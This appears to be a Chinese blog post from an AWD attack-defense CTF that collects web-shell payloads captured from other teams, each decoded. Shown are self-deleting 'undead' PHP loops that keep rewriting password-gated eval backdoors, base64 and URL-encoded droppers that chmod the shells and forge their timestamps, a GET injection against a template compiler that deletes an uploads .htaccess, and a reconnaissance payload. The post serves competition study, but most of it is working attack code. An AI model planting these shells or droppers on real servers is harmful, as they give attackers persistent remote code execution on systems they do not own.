    $shell = '<?php if($_REQUEST[hash]=="f9b69a096514f282128935fd077f2ebb"){$c_1 = base64_decode(str_rot13($_REQUEST[a]));$c_2 = base64_decode(str_rot13($_REQUEST[b]));$c_1($c_2);}?>';
    unlink(__FILE__);
    while (TRUE) {{
    if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
    usleep(5);
    }}
    ?Pg== | /usr/bin/base64 -d | /bin/cat > /var/www/html//--8f02938e9d21e67bfc87240f584d6443.php;/bin/echo ZHANG777');
  • 5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
%24path+%3D+%27%2Fhome%2Fteam%2Fworkdir%2Fskin%2F--ssssss.php%27%3B%24data+%3D+%27PD9waHAKICAgIGlnbm9yZV91c2VyX2Fib3J0KHRydWUpOwogICAgc2V0X3RpbWVfbGltaXQoMCk7CiAgICB3aGlsZSAoMSl7CiAgICAgICAgJHBhdGggPSAiL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLnNzc3Nzcy5waHAiOwogICAgICAgICRkYXRhID0gIjw%2FcGhwIGlmKG1kNShcJF9QT1NUWydwYXNzJ10pPT0nYzI3MjFkODM2ZGRiNjg2YjBiMDFjYjAwNjYwODk5NTAnKUBldmFsKFwkX1BPU1RbJ2NtZCddKTs%2FPiI7CiAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRwYXRoLCAkZGF0YSk7CiAgICAgICAgc3lzdGVtKCdjaG1vZCA1MDAgJy4kcGF0aCk7CiAgICAgICAgdXNsZWVwKDEwMCk7CiAgICB9CiAgICA%2FPg%3D%3D%27%3B%24data%3D+base64_decode%28%24data%29%3B%40file_put_contents%28%24path%2C%24data%29%3Bsystem%28%27chmod+500+%27.%24path%29%3Bsystem%28%27%27rm+%29

// deocde
$path = '/home/team/workdir/skin/--ssssss.php';$data = 'PD9waHAKICAgIGlnbm9yZV91c2VyX2Fib3J0KHRydWUpOwogICAgc2V0X3RpbWVfbGltaXQoMCk7CiAgICB3aGlsZSAoMSl7CiAgICAgICAgJHBhdGggPSAiL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLnNzc3Nzcy5waHAiOwogICAgICAgICRkYXRhID0gIjw/cGhwIGlmKG1kNShcJF9QT1NUWydwYXNzJ10pPT0nYzI3MjFkODM2ZGRiNjg2YjBiMDFjYjAwNjYwODk5NTAnKUBldmFsKFwkX1BPU1RbJ2NtZCddKTs/PiI7CiAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRwYXRoLCAkZGF0YSk7CiAgICAgICAgc3lzdGVtKCdjaG1vZCA1MDAgJy4kcGF0aCk7CiAgICAgICAgdXNsZWVwKDEwMCk7CiAgICB9CiAgICA/Pg==';$data= base64_decode($data);@file_put_contents($path,$data);system('chmod 500 '.$path);system(''rm )

// base64 decode
$path = '/home/team/workdir/skin/--ssssss.php';$data = '<?php
ignore_user_abort(true);
set_time_limit(0);
while (1){
$path = "/home/team/workdir/skin/.ssssss.php";
$data = "<?php if(md5(\$_POST['pass'])=='c2721d836ddb686b0b01cb0066089950')@eval(\$_POST['cmd']);?>";
@file_put_contents($path, $data);
system('chmod 500 '.$path);
usleep(100);
}
?>';$data= base64_decode($data);@file_put_contents($path,$data);system('chmod 500 '.$path);system(''rm )
  • 删、覆盖上传目录的.htaccess

    1
    GET //libraries/lithium/template/view/Compiler.php?along=system('/bin/echo mo123;rm /home/team/workdir/app/webroot/uploads/.htaccess;/bin/echo xiaoxi456890');
  • 还有个没看懂的
    ip:192.168.17.11

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    %40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22d32d8%22%3B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3Becho%20%221d77b%22%3Bdie()%3B

    //decode
    @ini_set("display_errors", "0");
    @set_time_limit(0);
    echo "d32d8";
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
    $R="{$D} ";
    if(substr($D,0,1)!="/"){
    foreach(range("C","Z")as$L)
    if(is_dir("{$L}:")
    )$R.="{$L}:";
    }else{$R.="/";}$R.=" ";
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "1d77b";die();
  • Nu1l的shell1:
    192.168.21.x

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
file_put_contents('Nu1ls.php',base64_decode("PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CgkJZmlsZV9wdXRfY29udGVudHMoJy4vLm51MWxjdGZzLnBocCcsICc8P3BocCBAZXZhbCgkX0dFVFsnbnVsbCddKTsnKTsKCQlzeXN0ZW0oJ2NobW9kIDc3NyAuY29uZmlnLnBocCcpOwkJCQkJCgkJLy/mjIHnu63lnKhjb25maWcucGhw5Lit5YaZ5YWlCgkJdG91Y2goIi4vLm51MWxjdGZzLnBocCIsIG1rdGltZSgyMCwxNSwxLDExLDE3LDIwMTcpKTsJCgkJdXNsZWVwKDEwMCk7Cgl9Cj8+Cg=="))


base64解码:
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
file_put_contents('./.nu1lctfs.php', '<?php @eval($_GET['null']);');
system('chmod 777 .config.php');
touch("./.nu1lctfs.php", mktime(20,15,1,11,17,2017));
usleep(100);
}
?>
  • Nu1l的shell2:
    1
    2
    3
    4
    5
    6
    file_put_contents%28%22Nu1ls.php%22%2Cbase64_decode%28%22PD9waHAgQGV2YWwoJF9QT1NUWydob21hZWJpYyddKTs%2FPg%3D%3D%22%29%29%3B&zzz=aaa

    //decode
    file_put_contents("Nu1ls.php",base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydob21hZWJpYyddKTs/Pg=="));&zzz=aaa

    //file_put_contents("Nu1ls.php",base64_decode("<?php @eval($_POST['homaebic']);?>"));&zzz=aaa

final

最后还有一些骚套路,等考完试写好awd框架了一起分享出来~